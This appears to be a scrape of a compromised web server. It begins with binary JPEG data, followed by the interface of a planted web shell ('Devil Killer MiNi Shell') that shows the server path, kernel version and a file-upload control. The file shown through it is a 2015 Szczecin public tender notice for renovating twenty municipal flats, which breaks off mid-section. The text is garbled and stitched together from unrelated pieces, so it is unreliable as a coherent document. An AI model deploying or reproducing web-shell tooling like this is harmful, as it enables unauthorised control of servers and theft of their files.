JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150820/214828-N-2015.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu dwudziestu komunalnych lokali mieszkalnych 
w Szczecinie, w podziale na osiem części</b><br>
<b>Numer ogłoszenia: 214828 - 2015; data zamieszczenia: 20.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu dwudziestu komunalnych lokali mieszkalnych 
w Szczecinie, w podziale na osiem części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu dwudziestu komunalnych lokali mieszkalnych w Szczecinie, w podziale na osiem części:
1)	Część 1 zamówienia - remont lokali mieszkalnych przy ul. Światowida 36/3, 
ul. Niemcewicza 36/16;
2)	Część 2 zamówienia - remont lokali mieszkalnych przy ul. Kołłątaja 31/23,
ul. Kołłątaja 31/24, ul. Wielkopolska 29/22; 
3)	Część 3 zamówienia - remont lokali mieszkalnych przy ul. Unisławy 23/12, 
ul. Bohaterów Warszawy 87/10; 
4)	Część 4 zamówienia - remont lokalu mieszkalnego przy ul. Bogusława 34/2,                 ul. Bogusława 41/14;
5)	Część 5 zamówienia - remont lokali mieszkalnych przy ul. Krzywoustego 12/2 , ul. Krzywoustego 70/10, ul. Krzywoustego 76/4;
6)	Część 6 zamówienia - remont lokali mieszkalnych przy ul. Łokietka 3/20, 
ul. Łokietka 27/20;
7)	Część 7 zamówienia - remont lokali mieszkalnych przy ul. Powstańców Wielkopolskich 30A/19, ul. Powstańców Wielkopolskich 39/8, ul. Powstańców Wielkopolskich 44/2, 
8)	Część 8 zamówienia - remont lokali mieszkalnych przy ul. Szczawiowa 15/6, 
ul. Mieszka I 102/60, ul. Szpitalna 9/16;

2.	Zakres remontu poszczególnych lokali mieszkalnych:

CZĘŚĆ 1
1)	nr 3 w budynku przy ul. Światowida 36 (powierzchnia użytkowa lokalu - 38,75 m2):
a)	branża budowlana - uzupełnianie tynków, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wymiana stolarki drzwiowej, przestawienie pieców kaflowych, montaż czujnika czadu, mycie po robotach malarskich, wywóz gruzu, 
b)	branża sanitarna - montaż kuchni gazowej, próba szczelności instalacji gazowej, wymiana zlewozmywaka, wymiana wodomierza, opinia kominiarska,
c)	branża elektryczna - wymiana instalacji i osprzętu, wymiana WLZ, wymiana tablic, pomiar rezystancji izolacji instalacji elektrycznej.

2)	nr 16 w budynku przy ul. Niemcewicza 36 (powierzchnia użytkowa lokalu - 88,81 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przestawienie piecy kaflowych, rekontrola kominiarska,
b)	branża sanitarna - montaż kuchni gazowej, próba instalacji gazowej, montaż wodomierza, montaż baterii, montaż zlewozmywaka, montaż ustępu,
c)	branża elektryczna - wymiana instalacji i osprzętu , wymiana tablicy, wymiana grzejnika akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych, roboty uzupełniające.

CZĘŚĆ 2
3)	nr 23 w budynku przy ul. Kołłątaja 31 (powierzchnia użytkowa lokalu - 36,87 m2):
a)	branża budowlana - wymiana stolarki drzwiowej, przestawienie piecy kaflowych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, mycie po robotach malarskich, wywóz gruzu, rekontrola kominiarska,
b)	branża sanitarna - wymiana kuchni gazowej, próba instalacji gazowej, wymiana baterii, wymiana wodomierza, wymiana zlewozmywaka, wymiana ustępu,
c)	branża elektryczna - wymiana instalacji i osprzętu, wymiana tablicy, pomiary rezystancji izolacji instalacji elektrycznych, 

4)	nr 24 w budynku przy ul. Kołłątaja 31 (powierzchnia użytkowa lokalu - 34,13 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, montaż nawiewników okiennych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, mycie po robotach malarskich, wywóz gruzu, rekontrola kominiarska,
b)	branża sanitarna - wymiana kuchni gazowej, wymiana baterii, wymiana wodomierza, wymiana zlewozmywaka, wymiana ustępu, próba instalacji gazowej,
c)	branża elektryczna - wymiana instalacji i osprzętu , wymiana tablicy, wymiana grzejnika akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych, roboty uzupełniające.

5)	nr 22 w budynku przy ul. Wielkopolskiej 29 (powierzchnia użytkowa lokalu - 36,56 m2):
a)	branża budowlana - dwukrotne malowania farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wymiana stolarki drzwiowej i okiennej, przestawienie pieca kaflowego, montaż detektora tlenku węgla, wywóz gruzu,
b)	branża sanitarna - montaż zlewozmywaka, montaż wodomierza, próba instalacji gazowej
c)	branża elektryczna - wymiana instalacji i osprzętu, wymiana tablicy, wymiana grzejnika akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznej, roboty uzupełniające. 

CZĘŚĆ 3
6)	nr 12 w budynku przy ul. Unisławy 23 (powierzchnia użytkowa lokalu - 41,01m2):
a)	branża budowlana - naprawa tynków, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wymiana stolarki drzwiowej, montaż nawiewników okiennych, wywóz gruzu, 
b)	branża sanitarna - wymiana kotła gazowego, wymiana kuchni gazowej, wymiana rurociągów C.O. częściowa, próba instalacji gazowej, wymiana baterii, wymiana wodomierza, wymiana zlewozmywaka, wymiana wanny, wykonanie dokumentacji legalizacyjnej łazienki,
c)	branża elektryczna - wymiana przewodów i osprzętu, wymiana tablicy, wymiana WLZ, pomiary rezystancji izolacji instalacji elektrycznej.

7)	nr 10 w budynku przy ul. Bohaterów Warszawy 87 (powierzchnia użytkowa lokalu - 20,18 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, przestawienie pieca kaflowego, wywóz gruzu,
b)	branża sanitarna - opinia kominiarska, wymiana umywalki, wymiana zlewozmywaka, wymiana ustępu i baterii, wymiana wodomierza,
c)	branża elektryczna - wymiana instalacji i osprzętu , wymiana tablicy, wymiana kuchenki elektrycznej, wymiana podgrzewacza wody, pomiary rezystancji izolacji instalacji elektrycznej,



CZĘŚĆ 4
8)	nr 2 w budynku przy ul. Bogusława 34 (powierzchnia użytkowa lokalu - 25,68 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu, 
b)	branża sanitarna - wymiana kuchni gazowej, próba instalacji gazowej, montaż wodomierza, montaż ustępu
c)	branża elektryczna - wymiana instalacji i osprzętu, pomiary rezystancji izolacji instalacji elektrycznej.

9)	nr 14 w budynku przy ul. Bogusława 41 (powierzchnia użytkowa lokalu - 39,51 m2):
a)	branża budowlana - wymiana okien i drzwi, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)	branża sanitarna - wymiana kuchni gazowej, próba instalacji gazowej, montaż czujnika czadu, wymiana  wodomierza, wymiana ustępu,
c)	branża elektryczna - wymiana instalacji i osprzętu , wymiana tablicy, wymiana pieca akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych.

CZĘŚĆ 5
10)	nr 2 w budynku przy ul. Krzywoustego 12 (powierzchnia użytkowa lokalu - 36,93 m2):
a)	branża budowlana - montaż nawiewników okiennych, naprawa tynków, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)	branża sanitarna - wymiana kuchni gazowej, próba instalacji gazowej, wymiana zlewozmywaka, wymiana ustępu, wymiana wodomierza,
c)	branża elektryczna - wymiana instalacji i osprzętu, wymiana tablicy, wymiana pieca akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych.  

11)	nr 10 w budynku przy ul. Krzywoustego 70 (powierzchnia użytkowa lokalu - 33,89 m2):
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)	branża sanitarna - wymiana kuchenki gazowej, montaż czujnika czadu, próba instalacji gazowej, wymiana ustępu, wymiana wodomierza,
c)	branża elektryczna - wymiana instalacji i osprzętu , wymiana tablicy, wymiana pieca akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych.

12)	nr 4 w budynku przy ul. Krzywoustego 76 (powierzchnia użytkowa lokalu - 34,94 m2):
a)	branża budowlana - dwukrotne malowania farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)	branża sanitarna - wymiana kuchni gazowej, montaż czujnika czadu, próba instalacji gazowej, wymiana ustępu, wymiana zlewozmywaka, wymiana wodomierza,
c)	branża elektryczna - wymiana instalacji i osprzętu, wymiana tablicy, pomiary rezystancji izolacji instalacji elektrycznych.


CZĘŚĆ 6
13)	nr 20 w budynku przy ul. Łokietka 3 (powierzchnia użytkowa lokalu - 39,49 m2):
a)	branża budowlana - montaż nawiewników okiennych, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu
b)	branża sanitarna - wymiana kuchni gazowej, montaż czujnika czadu, próba instalacji gazowej,
c)	branża elektryczna - wymiana instalacji i osprzętu, wymiana tablicy, pomiary rezystancji izolacji instalacji elektrycznych.

14)	nr 20 w budynku przy ul. Łokietka 27 (powierzchnia użytkowa lokalu - 37,56 m2):
a)  branża budowlana - montaż nawiewników okiennych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wymiana stolarki drzwiowej, naprawa posadzki, wywóz gruzu,
b)	branża sanitarna - wymiana kuchni gazowej, próba instalacji gazowej, montaż wodomierza, wymiana ustępu,
c)	branża elektryczna - wymiana instalacji i osprzętu , wymiana tablicy, wymiana pieca akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych.

CZĘŚĆ 7
15)	nr 19 w budynku przy ul. Powstańców Wielkopolskich 30A (powierzchnia użytkowa lokalu - 43,27 m2):
a) branża budowlana - naprawa tynków, wymiana stolarki okiennej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, mycie po robotach malarskich, naprawa posadzki, wywóz gruzu, postawienie pieca kaflowego,
b)	branża sanitarna - wymiana kuchenki gazowej, próba instalacji gazowej, wymiana zlewozmywaka, wymiana ustępu, wymiana wodomierza, wymiana baterii,
c)  branża elektryczna - wymiana instalacji i osprzętu, wymiana pieca akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych.  

16)	nr 8 w budynku przy ul. Powstańców Wielkopolskich 39 (powierzchnia użytkowa lokalu - 41,58 m2):
a)  branża budowlana - naprawa tynków, wymiana stolarki okiennej i drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, mycie po robotach malarskich, wywóz gruzu, naprawa posadzki, postawienie pieca kaflowego, opinia kominiarska,
b)  branża sanitarna - wymiana kuchni gazowej, wymiana ustępu, wymiana wodomierza, baterii, próba instalacji gazowej
c)  branża elektryczna - wymiana instalacji i osprzętu , montaż pieca akumulacyjnego, pomiary rezystancji izolacji instalacji elektrycznych.

17)	nr 2 w budynku przy ul. Powstańców Wielkopolskich 44 (powierzchnia użytkowa lokalu - 40,85 m2):
a)	branża budowlana - montaż nawiewników okiennych, wymiana stolarki drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu, naprawa posadzki, mycie po robotach malarskich, przestawienie pieca kaflowego, opinia kominiarska
b)	branża sanitarna - wymiana kuchni gazowej, wymiana zlewozmywaka, ustępu, wodomierza, próba instalacji gazowej, przewody wentylacyjne z blachy stalowej
c)	branża elektryczna - wymiana instalacji elektrycznej i osprzętu, montaż unifonu, tablicy, pomiar rezystancji izolacji instalacji elektrycznej.

CZĘŚĆ 8
18)	nr 6 w budynku przy ul. Szczawiowa 15 (powierzchnia użytkowa lokalu - 56,04 m2):
a) branża budowlana - montaż nawiewników okiennych, wymiana stolarki drzwiowej, dwukrotne malowanie farbami emulsyjnymi tynków wewnętrznych, naprawa posadzki, opinia kominiarska, mycie po robotach malarskich , wywóz gruzu,
b)	branża sanitarna - wymiana kuchni gazowej, wymiana kotła grzewczego, montaż wkładu kominowego, montaż detektora tlenku węgla, próba instalacji gazowej, wymiana brodzika, zlewozmywaka, wodomierza,
c)  branża elektryczna - wymiana instalacji i osprzętu, montaż unifonu, pomiary.

19)	nr 60 w budynku przy ul. Mieszka I 102 (powierzchnia użytkowa lokalu - 18,90 m2):
a) branża budowlana - wymiana stolarki drzwiowej, dwukrotne malowanie farbami emulsyjnymi tynków wewnętrznych, mycie po robotach malarskich, naprawa posadzki, wywóz gruzu,
b)  branża sanitarna - wymiana kuchni gazowej, wymiana zlewozmywaka, opinia kominiarska, wymiana umywalki, wymiana brodzika, wymiana wodomierza, baterii, próba instalacji gazowej,
c)  branża elektryczna - wymiana instalacji i osprzętu , pomiar rezystancji izolacji instalacji elektrycznej.

20)	nr 16 w budynku przy ul. Szpitalna 9 (powierzchnia użytkowa lokalu - 40,49 m2):
a)	branża budowlana - wymiana stolarki okiennej i drzwiowej, montaż nawiewników okiennych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, przestawienie pieców kaflowych, mycie, wywóz gruzu,
b)	branża sanitarna - wymiana kuchni gazowej, próba instalacji gazowej, opinia kominiarska, wymiana zlewozmywaka, ustępu, baterii, wodomierza,
c)	branża elektryczna - wymiana instalacji elektrycznej i osprzętu, wymiana tablicy, pomiary rezystancji izolacji instalacji elektrycznych.
3.  Przedmiot zamówienia należy wykonać zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, warunkami technicznymi oraz sztuką budowlaną. Roboty należy prowadzić zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy przy wykonywaniu robót budowlanych i przepisami p.poż.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości:
1)	dla Części 1 zamówienia - (ul. Światowida 36/3, ul. Niemcewicza 36/16) - 1.036,00 zł (słownie: jeden tysiąc trzydzieści sześć złotych),
2)	dla Części 2 zamówienia (ul. Kołłątaja 31/23, ul. Kołłątaja 31/24, ul. Wielkopolska 29/22) - 1.185,00 zł (słownie: jeden tysiąc sto osiemdziesiąt pięć złotych),
3)	dla Części 3 zamówienia (ul. Unisławy 23/12, ul. Boh. Warszawy 87/10) - 799,00zł (słownie: siedemset dziewięćdziesiąt dziewięć złotych),
4)	dla Części 4 zamówienia (ul. Bogusława 34/2, ul. Bogusława 41/14) - 829,00 zł (słownie: osiemset dwadzieścia dziewięć złotych),
5)	dla Części 5 zamówienia (ul. Krzywoustego 12/2, ul. Krzywoustego 70/10, ul. Krzywoustego 76/4) - 880,00 zł (słownie: osiemset osiemdziesiąt złotych),
6)	dla Części 6 zamówienia (przy ul. Łokietka 3/20, ul. Łokietka 27/20) - 609,00 zł (słownie: sześćset dziewięć złotych),
7)	dla Części 7 zamówienia (przy ul. Powstańców Wlkp. 30A/19, ul. Powstańców Wlkp. 39/8, Powstańców Wlkp 44/2) - 1.349,00 zł (słownie: jeden tysiąc trzysta czterdzieści dziewięć złotych),
8)	dla Części 8 zamówienia (przy ul. Szczawiowa 15/6, ul. Mieszka I 102/60, ul. Szpitalna 9/16) - 959,00 zł (słownie: dziewięćset pięćdziesiąt dziewięć złotych),
w terminie do dnia 03.09.2015 r. do godziny 9:00. Decyduje data wpływu środków do zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto w PKOBP nr 36 1020 4795 0000 9302 0292 7648, 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
     Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy               ul. Mariackiej 25, pokój nr 9, przed upływem terminu składania ofert.
3.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub  gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1)	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji - Gminy Miasto Szczecin) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w  ust.6 bez potwierdzania tych okoliczności, 
2)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą.
4.	Wadium może być wniesione w jednej lub kilku formach.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał  należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie minimum jednego remontu lokalu mieszkalnego we wszystkich branżach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.

UWAGA:
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2013 r., poz. 1409) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

